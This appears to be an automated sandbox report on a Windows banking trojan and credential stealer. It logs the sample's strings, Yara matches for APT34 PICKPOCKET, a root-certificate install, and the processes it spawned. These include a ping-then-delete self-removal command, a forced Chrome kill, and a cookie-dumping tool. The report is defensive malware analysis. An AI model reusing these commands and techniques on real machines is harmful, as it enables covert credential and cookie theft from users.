Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040AE4D OpenClipboard,
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403660: DeviceIoControl,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00404050
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004093D5
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403FA9
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000C063
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000B883
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100060F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100169BD
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100099E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100071F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10009257
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010AED
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10008340
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E380
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000ABA0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000B3B0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001EBD0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100083F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000BC57
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000C483
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010590
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001EDDB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00996A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00999B7F
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: String function: 10010534 appears 35 times
Source: 1611970637183.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970637183.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cyfj6XGbkd.exe, 00000000.00000002.365545591.0000000000680000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365550326.0000000000690000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000000.342542352.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365576520.00000000007F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exeBinary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: Cyfj6XGbkd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991058 CoCreateInstance,
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Login Data1611970607033Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to behavior
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970637183.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Users\user\Desktop\Cyfj6XGbkd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exeStatic file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
